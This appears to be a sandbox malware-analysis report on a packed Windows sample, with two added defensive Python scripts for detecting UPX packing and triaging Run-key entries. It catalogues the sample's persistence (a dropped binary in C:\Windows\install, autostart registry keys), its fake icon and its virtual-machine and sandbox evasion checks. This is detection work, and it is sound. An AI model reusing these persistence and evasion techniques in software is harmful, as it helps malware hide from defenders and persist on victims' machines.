            Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001C.00000003.530737964.00000000031FD000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.552584359.0000000000B9A000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.566720629.0000000003279000.00000004.00000001.sdmp
            Source: Binary string: iphlpapi.pdb! source: WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: WinTypes.pdb} source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: combase.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
            Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wsock32.pdbw source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: pstorec.pdbTr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdbS source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00455C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00455C10
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00404846 push 00404874h; ret 1_2_0040486C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00404848 push 00404874h; ret 1_2_0040486C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004048E4 push 00404910h; ret 1_2_00404908
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004050EC push 00405118h; ret 1_2_00405110
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040B080 push 0040B0ACh; ret 1_2_0040B0A4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0045288C push cs; retf 1_2_0045288D
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004058A8 push 004058D4h; ret 1_2_004058CC
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00409948 push 00409974h; ret 1_2_0040996C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00407100 push 0040712Ch; ret 1_2_00407124
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00408918 push 00408954h; ret 1_2_0040894C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040891C push 00408954h; ret 1_2_0040894C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00407138 push 00407164h; ret 1_2_0040715C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004071C4 push 004071F0h; ret 1_2_004071E8
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040718C push 004071B8h; ret 1_2_004071B0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040898E push 004089BCh; ret 1_2_004089B4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00408990 push 004089BCh; ret 1_2_004089B4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00452A04 push ds; retf 1_2_00452A12
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040720A push 00407238h; ret 1_2_00407230
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040720C push 00407238h; ret 1_2_00407230
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00404216 push 00404244h; ret 1_2_0040423C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00404218 push 00404244h; ret 1_2_0040423C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040BAD0 push 0040BB00h; ret 1_2_0040BAF8
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00407AE8 push 00407B24h; ret 1_2_00407B1C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00407AEC push 00407B24h; ret 1_2_00407B1C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004032B8 push 004032F2h; ret 1_2_004032EA
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00406B10 push 00406B48h; ret 1_2_00406B40
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_0040345C push 00403494h; ret 1_2_0040348C
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00404C88 push 00404E05h; ret 1_2_00404DFD
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004034A0 push 004034CCh; ret 1_2_004034C4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004045CB push 004045F8h; ret 1_2_004045F0
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_004045CC push 004045F8h; ret 1_2_004045F0
            Source: initial sample Static PE information: section name: UPX0
            Source: initial sample Static PE information: section name: UPX1
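            The UPX0/UPX1 section names above are the default names the UPX packer writes into the section table. The Python below is an added example, not code from the report or from the sample: it reads the PE section table by hand (no third-party module) and reports the UPX indicators a triage script would look for. It runs against a constructed PE header built inline; the section names and sizes in that header are assumed for the demonstration, not read from this sample.

```python
"""
Added example (not from the Joe Sandbox report): a minimal PE section-table
reader that flags the UPX0/UPX1 section names reported in the static PE
information. Headers are parsed with struct only, and the input is a
constructed PE image built below.
"""
import struct

# Section names UPX writes by default; "UPX2" appears when a resource
# section is kept. Renamed sections are not caught by this name check.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}


def parse_sections(data: bytes) -> list:
    """Return the section table of a PE image as a list of dicts."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    sec_off = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        off = sec_off + i * 40  # sizeof(IMAGE_SECTION_HEADER)
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({
            "name": name.rstrip(b"\0"),
            "virtual_size": vsize,
            "virtual_address": vaddr,
            "raw_size": rawsize,
            "raw_pointer": rawptr,
        })
    return sections


def upx_indicators(data: bytes) -> list:
    """Return human-readable reasons the image looks UPX-packed (empty if none)."""
    reasons = []
    sections = parse_sections(data)
    hits = [s["name"] for s in sections if s["name"] in UPX_SECTION_NAMES]
    if hits:
        reasons.append("UPX section names: " + ", ".join(n.decode() for n in hits))
    # UPX reserves its first section for the unpacked image: large virtual
    # size, no bytes on disk. That layout survives a section rename.
    for s in sections:
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            reasons.append(f"section {s['name'].decode(errors='replace')!r} has "
                           f"virtual size {s['virtual_size']:#x} but no raw data")
    return reasons


def build_pe(section_specs) -> bytes:
    """Build a constructed, minimal 32-bit PE header for testing (not a real binary)."""
    opt_size = 0xE0  # sizeof(IMAGE_OPTIONAL_HEADER32)
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, rest zeroed
    table = b""
    for name, vsize, vaddr, rawsize, rawptr in section_specs:
        table += struct.pack("<8sIIII", name, vsize, vaddr, rawsize, rawptr)
        table += b"\0" * (40 - 24)  # remaining IMAGE_SECTION_HEADER fields zeroed
    return dos + b"PE\0\0" + coff + opt + table


# Constructed sample with the layout UPX typically produces (sizes assumed).
PACKED_SAMPLE = build_pe([
    (b"UPX0", 0x30000, 0x1000, 0, 0x400),
    (b"UPX1", 0x25000, 0x31000, 0x24800, 0x400),
    (b".rsrc", 0x1000, 0x56000, 0x800, 0x24C00),
])

if __name__ == "__main__":
    for reason in upx_indicators(PACKED_SAMPLE):
        print(reason)
```

            Renaming the sections defeats the name check, which is why the zero-raw-size test is reported separately; confirm with `upx -t` or by unpacking before relying on either signal.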

            Persistence and Installation Behavior:

            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\SysWOW64\explorer.exe Executable created and started: C:\Windows\install\TEXTURAFIVEM.exe
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe File created: C:\Windows\install\TEXTURAFIVEM.exe
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,1_2_00409EF8
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 4_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,4_2_00409EF8
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 5_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,5_2_00409EF8
            Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: 9_2_00409EF8 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryA,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetPrivateProfileStringA,CreateFileA,GetFileSize,ReadFile,CloseHandle,FreeLibrary,FreeLibrary,9_2_00409EF8

            Boot Survival:

            Creates an autostart registry key pointing to binary in C:\Windows
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKCU
            Creates an undocumented autostart registry key
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Policies
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 20_2_2403C858 OpenSCManagerA,OpenServiceA,StartServiceA,ControlService,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,20_2_2403C858
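            Both autostart locations listed in this section (the HKCU Run value named HKCU and the HKLM Policies\Explorer\Run value named Policies) can be pulled off a host with `reg export` and checked offline. The Python below is an added example, not code from the report: it parses a .reg export and flags entries in the rarely used Policies\Explorer\Run key and entries whose binary sits in a non-standard C:\Windows subdirectory. The .reg text it parses is constructed; the command-line data in it is assumed, since the report lists only key paths and value names, and the path C:\Windows\install\TEXTURAFIVEM.exe is taken from the Persistence section above.

```python
"""
Added example (not part of the report): triage of Run-key entries from a
`reg export` dump. The export text below is constructed and its value data
are assumed; only the key paths, value names and the dropped file path come
from the analysis report.
"""
import re

# Autostart keys the report shows being written, plus their HKLM/HKCU twins.
WATCHED_KEYS = {
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
}
# Policies\Explorer\Run is valid but rarely used; any value there deserves a look.
RARE_KEY_MARKER = r"\policies\explorer\run"
# Directories under C:\Windows where an autostart binary would normally live.
EXPECTED_WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_reg_export(text: str) -> dict:
    """Parse [key] / "name"="data" lines of a .reg export into {key: {name: data}}."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
        elif current and line.startswith('"'):
            # REG_SZ only; hex(...) values are left for the caller to handle.
            m = re.match(r'"((?:[^"\\]|\\.)*)"=(?:"((?:[^"\\]|\\.)*)")?', line)
            if m:
                name = m.group(1).replace("\\\\", "\\")
                data = (m.group(2) or "").replace('\\"', '"').replace("\\\\", "\\")
                result[current][name] = data
    return result


def extract_image_path(command: str) -> str:
    """Return the executable path from a Run value's command line (quoted or not)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ")[0]


def triage_autoruns(reg_text: str) -> list:
    """Return (key, value_name, path, reason) tuples for suspicious watched-key entries."""
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        if key not in WATCHED_KEYS:
            continue
        for name, data in values.items():
            path = extract_image_path(data)
            lower = path.lower()
            reasons = []
            if RARE_KEY_MARKER in key.lower():
                reasons.append("rarely used autostart key")
            if lower.startswith("c:\\windows\\") and not lower.startswith(EXPECTED_WINDOWS_DIRS):
                reasons.append("binary in a non-standard C:\\Windows subdirectory")
            if reasons:
                findings.append((key, name, path, "; ".join(reasons)))
    return findings


# Constructed export: value names from the report, command lines assumed.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"HKCU"="C:\\Windows\\install\\TEXTURAFIVEM.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Policies"="C:\\Windows\\install\\TEXTURAFIVEM.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
'''

if __name__ == "__main__":
    for key, name, path, why in triage_autoruns(SAMPLE_EXPORT):
        print(f"{key}\\{name} -> {path}: {why}")
```

            On a live host, `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` and the HKLM equivalents produce the input (reg export writes UTF-16, so decode before parsing). REG_EXPAND_SZ values appear as `hex(2):` byte lists and are not decoded by this parser; they would need handling before the path check.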

            Hooking and other Techniques for Hiding and Protection:

            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon (1501).png
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: 1_2_00404E10 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00404E10
            Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect virtual machines
Source: C:\Users\user\Desktop\dqH3t8JU1x.exe Code function: VBoxService.exe VBoxService.exe 1_2_004051CC
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: VBoxService.exe VBoxService.exe 4_2_004051CC
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: VBoxService.exe VBoxService.exe 5_2_004051CC
Source: C:\Windows\install\TEXTURAFIVEM.exe Code function: VBoxService.exe VBoxService.exe 9_2_004051CC
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: dqH3t8JU1x.exe, 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp Binary or memory string: SBIEDLL.DLLS3
Source: TEXTURAFIVEM.exe, TEXTURAFIVEM.exe, 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Windows\SysWOW64\explorer.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\explorer.exe Code function: OpenSCManagerA,EnumServicesStatusA,CloseServiceHandle,20_2_2403C9E0
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 1800000 (2 occurrences)
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 922337203685477 (64 occurrences; 922337203685477 ms is 2^63 100-ns intervals, the largest relative timeout expressible, i.e. an effectively indefinite wait)
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 955
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: foregroundWindowGot 1347
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: foregroundWindowGot 449
Source: C:\Windows\SysWOW64\explorer.exe TID: 5208 Thread sleep time: -39600000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5348 Thread sleep time: -70000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2880 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6380 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2276 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6116 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6268 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5796 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5208 Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6656 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6252 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4668 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5132 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6248 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6504 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6524 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5464 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5472 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1208 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6620 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5980 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4996 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6340 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 400 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 600 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6640 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4280 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6604 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4708 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6924 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7124 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4780 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7152 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3000 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5784 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3036 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6556 Thread sleep time: -922337203685477s >= -30000s
